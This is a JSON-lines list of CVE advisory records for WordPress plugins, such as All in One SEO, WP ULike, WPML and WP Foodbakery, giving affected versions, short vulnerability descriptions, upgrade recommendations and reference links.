{"CVE_ID":"CVE-2025-2892","slug":"all-in-one-seo-pack","versionImpact":"4.8.1.1","versionEndExcluding":"4.8.2","description":"The All in One SEO \u2013 Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the post Meta Description and Canonical URL parameters in all versions up to, and including, 4.8.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289874\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3289874\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fd5d31d-a4f3-458a-b457-f20aeaa71749?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fd5d31d-a4f3-458a-b457-f20aeaa71749?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6938","slug":"oxygenbuilder","versionImpact":"4.8","versionEndExcluding":"4.8.1","description":"The Oxygen Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a custom field in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Version 4.8.1 of the Oxygen Builder plugin for WordPress addresses this vulnerability by implementing an optional filter to provide output escaping for dynamic data. Please see https:\/\/oxygenbuilder.com\/documentation\/other\/security\/#filtering-dynamic-data for more details.","recommendation":"Update to version 4.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee069cb3-370e-48ea-aa35-c30fe83c2498?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee069cb3-370e-48ea-aa35-c30fe83c2498?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-8-1-now-available\\\/\",\"name\":\"https:\\\/\\\/oxygenbuilder.com\\\/oxygen-4-8-1-now-available\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13011","slug":"wp-foodbakery","versionImpact":"4.7","versionEndExcluding":"4.8","description":"The WP Foodbakery plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'upload_publisher_profile_image' function in versions up to, and including, 4.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/850fc4db-6e02-44c7-836a-02c433a0bae7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/850fc4db-6e02-44c7-836a-02c433a0bae7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12848","slug":"skt-builder","versionImpact":"4.7","versionEndExcluding":"4.8","description":"The SKT Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the 'addLibraryByArchive' function in all versions up to, and including, 4.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.","recommendation":"Update to version 4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-builder\\\/trunk\\\/sktbuilder.php#L960\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/skt-builder\\\/trunk\\\/sktbuilder.php#L960\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213786%40skt-builder&new=3213786%40skt-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3213786%40skt-builder&new=3213786%40skt-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218995%40skt-builder&new=3218995%40skt-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218995%40skt-builder&new=3218995%40skt-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89e3cef3-c1aa-4df7-a9f9-1ca5837643e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89e3cef3-c1aa-4df7-a9f9-1ca5837643e1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13350","slug":"searchiq","versionImpact":"4.7","versionEndExcluding":"4.8","description":"The SearchIQ \u2013 The Search Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'siq_searchbox' shortcode in all versions up to, and including, 4.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchiq\\\/trunk\\\/library\\\/shortcode.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/searchiq\\\/trunk\\\/library\\\/shortcode.php#L132\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/searchiq\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/searchiq\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a04f074c-448d-4c5f-ae46-0ad1a3effdb4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a04f074c-448d-4c5f-ae46-0ad1a3effdb4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0180","slug":"wp-foodbakery","versionImpact":"4.7","versionEndExcluding":"4.8","description":"The WP Foodbakery plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.3. This is due to the plugin not properly restricting what user meta can be updated during profile registration. This makes it possible for unauthenticated attackers to register on the site as an administrator.","recommendation":"Update to version 4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/food-bakery-restaurant-bakery-responsive-wordpress-theme\\\/18970331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7140a6e-a528-428e-850e-5e4a481c5d7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7140a6e-a528-428e-850e-5e4a481c5d7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4254","slug":"chatbot","versionEndExcluding":"4.7.8","description":"The AI ChatBot WordPress plugin before 4.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dfffe48-e60d-4bab-b194-8a63554246c3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0dfffe48-e60d-4bab-b194-8a63554246c3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4253","slug":"chatbot","versionEndExcluding":"4.7.8","description":"The AI ChatBot WordPress plugin before 4.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1cbbab9e-be3d-4081-bc0e-c52d500d9871\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1cbbab9e-be3d-4081-bc0e-c52d500d9871\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7781","slug":"jupiterx-core","versionImpact":"4.7.5","versionEndExcluding":"4.7.8","description":"The Jupiter X Core plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 4.7.5. This is due to improper authentication via the Social Login widget. This makes it possible for unauthenticated attackers to log in as the first user to have logged in with a social media account, including administrator accounts. Attackers can exploit the vulnerability even if the Social Login element has been disabled, as long as it was previously enabled and used. The vulnerability was partially patched in version 4.7.5, and fully patched in version 4.7.8.","recommendation":"Update to version 4.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd279c2-9e95-45bd-9494-fb53a6333c65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd279c2-9e95-45bd-9494-fb53a6333c65?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/social-login-handler\\\/google.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/social-login-handler\\\/google.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/social-login-handler\\\/facebook.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/forms\\\/classes\\\/social-login-handler\\\/facebook.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153667\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153667\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9599","slug":"ays-popup-box","versionImpact":"4.7.7","versionEndExcluding":"4.7.8","description":"The Popup Box  WordPress plugin before 4.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9e8a2659-7a6c-4528-b0b2-64d462485b43\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9e8a2659-7a6c-4528-b0b2-64d462485b43\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12770","slug":"wp-ulike","versionImpact":"4.7.5","versionEndExcluding":"4.7.6","description":"The WP ULike  WordPress plugin before 4.7.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e21f6a4e-f385-411b-8d91-0f38f9e6cdd3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e21f6a4e-f385-411b-8d91-0f38f9e6cdd3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4972","slug":"download-monitor","versionImpact":"4.7.51","versionEndExcluding":"4.7.52","description":"The Download Monitor plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several REST-API routes related to reporting in versions up to, and including, 4.7.51. This makes it possible for unauthenticated attackers to view user data and other sensitive information intended for administrators.","recommendation":"Update to version 4.7.52, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9000c52-fdd7-43e2-ae6a-9f127c4a9fcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9000c52-fdd7-43e2-ae6a-9f127c4a9fcd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2822758\\\/download-monitor\\\/trunk\\\/src\\\/Admin\\\/Reports\\\/class-dlm-reports.php?contextall=1&old=2821522&old_path=%2Fdownload-monitor%2Ftrunk%2Fsrc%2FAdmin%2FReports%2Fclass-dlm-reports.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2822758\\\/download-monitor\\\/trunk\\\/src\\\/Admin\\\/Reports\\\/class-dlm-reports.php?contextall=1&old=2821522&old_path=%2Fdownload-monitor%2Ftrunk%2Fsrc%2FAdmin%2FReports%2Fclass-dlm-reports.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5858","slug":"infographic-and-list-builder-ilist","versionImpact":"4.7.4","versionEndExcluding":"4.7.5","description":"The AI Infographic Maker plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the qcld_openai_title_generate_desc AJAX action in all versions up to, and including, 4.7.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary post titles.","recommendation":"Update to version 4.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8f1c29-b99d-4af0-9cc4-5d6179529ab4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c8f1c29-b99d-4af0-9cc4-5d6179529ab4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infographic-and-list-builder-ilist\\\/trunk\\\/qc-project-ilist-ajax.php?rev=3102295#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/infographic-and-list-builder-ilist\\\/trunk\\\/qc-project-ilist-ajax.php?rev=3102295#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102754\\\/infographic-and-list-builder-ilist\\\/trunk\\\/qc-project-ilist-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3102754\\\/infographic-and-list-builder-ilist\\\/trunk\\\/qc-project-ilist-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7879","slug":"wp-ulike","versionImpact":"4.7.4","versionEndExcluding":"4.7.5","description":"The WP ULike  WordPress plugin before 4.7.5 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 4.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ad1c40a-5e13-40b6-8652-c23a1f39abc2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ad1c40a-5e13-40b6-8652-c23a1f39abc2\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7014","slug":"molongui-authorship","versionImpact":"4.7.4","versionEndExcluding":"4.7.5","description":"The Author Box, Guest Author and Co-Authors for Your Posts \u2013 Molongui plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.7.4 via the 'ma_debu' parameter. This makes it possible for unauthenticated attackers to extract sensitive data including post author emails and names if applicable.","recommendation":"Update to version 4.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538e9ce3-2d48-44ad-bd08-8eead3ef15c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/538e9ce3-2d48-44ad-bd08-8eead3ef15c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019084\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3019084\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9649","slug":"wp-ulike","versionImpact":"4.7.4","versionEndExcluding":"4.7.5","description":"The WP ULike \u2013 The Ultimate Engagement Toolkit for Websites plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.7.4. This is due to missing or incorrect nonce validation on the wp_ulike_delete_history_api() function. This makes it possible for unauthenticated attackers to delete engagements via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fcb35f8-ed88-4440-8cdf-95c1f0028253?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3fcb35f8-ed88-4440-8cdf-95c1f0028253?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-ulike\\\/blob\\\/fd5eb54948cc1af9c348530a3cbd89c5a4bc68d0\\\/wp-ulike\\\/admin\\\/admin-ajax.php#L78-L100\",\"name\":\"https:\\\/\\\/github.com\\\/WordpressPluginDirectory\\\/wp-ulike\\\/blob\\\/fd5eb54948cc1af9c348530a3cbd89c5a4bc68d0\\\/wp-ulike\\\/admin\\\/admin-ajax.php#L78-L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168233%40wp-ulike&new=3168233%40wp-ulike&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3168233%40wp-ulike&new=3168233%40wp-ulike&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7878","slug":"wp-ulike","versionImpact":"4.7.3","versionEndExcluding":"4.7.4","description":"The WP ULike  WordPress plugin before 4.7.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9166cf91-69e5-4786-a6a9-816db7d47b07\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9166cf91-69e5-4786-a6a9-816db7d47b07\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3488","slug":"sitepress-multilingual-cms","versionImpact":"4.7.3","versionEndExcluding":"4.7.4","description":"The WPML plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpml_language_switcher shortcode in versions 3.6.0 - 4.7.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpml.org\\\/category\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpml.org\\\/category\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpml.org\\\/documentation\\\/support\\\/wpml-coding-api\\\/shortcodes\\\/\",\"name\":\"https:\\\/\\\/wpml.org\\\/documentation\\\/support\\\/wpml-coding-api\\\/shortcodes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92c1bd85-5f81-4bb6-b6af-6cda85b91b9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/92c1bd85-5f81-4bb6-b6af-6cda85b91b9e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6559","slug":"xcloner-backup-and-restore","versionImpact":"4.7.3","versionEndExcluding":"4.7.4","description":"The Backup, Restore and Migrate WordPress Sites With the XCloner Plugin plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 4.7.3. This is due the plugin utilizing sabre without preventing direct access to the files. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 4.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0500c57a-3983-46e4-92fa-85f7fd47eba8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0500c57a-3983-46e4-92fa-85f7fd47eba8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3118643\\\/xcloner-backup-and-restore\\\/trunk\\\/vendor\\\/sabre\\\/vobject\\\/bin\\\/fetch_windows_zones.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3118643\\\/xcloner-backup-and-restore\\\/trunk\\\/vendor\\\/sabre\\\/vobject\\\/bin\\\/fetch_windows_zones.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13906","slug":"gallery-plugin","versionImpact":"4.7.3","versionEndExcluding":"4.7.4","description":"The Gallery by BestWebSoft \u2013 Customizable Image and Photo Galleries for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.7.3 via deserialization of untrusted input in the 'import_gallery_from_csv' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 4.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-plugin\\\/tags\\\/4.7.3\\\/gallery-plugin.php#L292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gallery-plugin\\\/tags\\\/4.7.3\\\/gallery-plugin.php#L292\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249573\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249573\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c5559d-f9dd-43cf-8c8e-07188b4edf7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/76c5559d-f9dd-43cf-8c8e-07188b4edf7f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9378","slug":"yml-for-yandex-market","versionImpact":"4.7.2","versionEndExcluding":"4.7.3","description":"The YML for Yandex Market plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 4.7.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a463c5be-13d9-45d8-b43e-54ab188c151a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a463c5be-13d9-45d8-b43e-54ab188c151a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yml-for-yandex-market\\\/tags\\\/4.7.2\\\/classes\\\/system\\\/pages\\\/settings-page\\\/class-y4ym-settings-page-feeds-wp-list-table.php#L311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yml-for-yandex-market\\\/tags\\\/4.7.2\\\/classes\\\/system\\\/pages\\\/settings-page\\\/class-y4ym-settings-page-feeds-wp-list-table.php#L311\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160483\\\/yml-for-yandex-market\\\/trunk\\\/classes\\\/system\\\/pages\\\/settings-page\\\/class-y4ym-settings-page-feeds-wp-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160483\\\/yml-for-yandex-market\\\/trunk\\\/classes\\\/system\\\/pages\\\/settings-page\\\/class-y4ym-settings-page-feeds-wp-list-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11278","slug":"gd-bbpress-attachments","versionImpact":"4.7.2","versionEndExcluding":"4.7.3","description":"The GD bbPress Attachments plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f598cfc-4d41-4d22-95f0-47efdb7d07a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6f598cfc-4d41-4d22-95f0-47efdb7d07a2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gd-bbpress-attachments\\\/trunk\\\/code\\\/front.php#L280\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gd-bbpress-attachments\\\/trunk\\\/code\\\/front.php#L280\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189863\\\/gd-bbpress-attachments\\\/trunk\\\/code\\\/front.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189863\\\/gd-bbpress-attachments\\\/trunk\\\/code\\\/front.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6792","slug":"wp-ulike","versionImpact":"4.7.2","versionEndExcluding":"4.7.2.1","description":"The WP ULike  WordPress plugin before 4.7.2.1 does not properly sanitize user display names when rendering on a public page.","recommendation":"Update to version 4.7.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c470edd-4b9b-461e-839f-f3a87f0060aa\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c470edd-4b9b-461e-839f-f3a87f0060aa\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3504","slug":"wp-google-map-plugin","versionImpact":"4.7.1","versionEndExcluding":"4.7.2","description":"The WP Maps  WordPress plugin before 4.7.2 does not sanitise and escape some of its Map settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/252484a6-96f0-43f3-a7dc-d20cc89ba119\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/252484a6-96f0-43f3-a7dc-d20cc89ba119\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
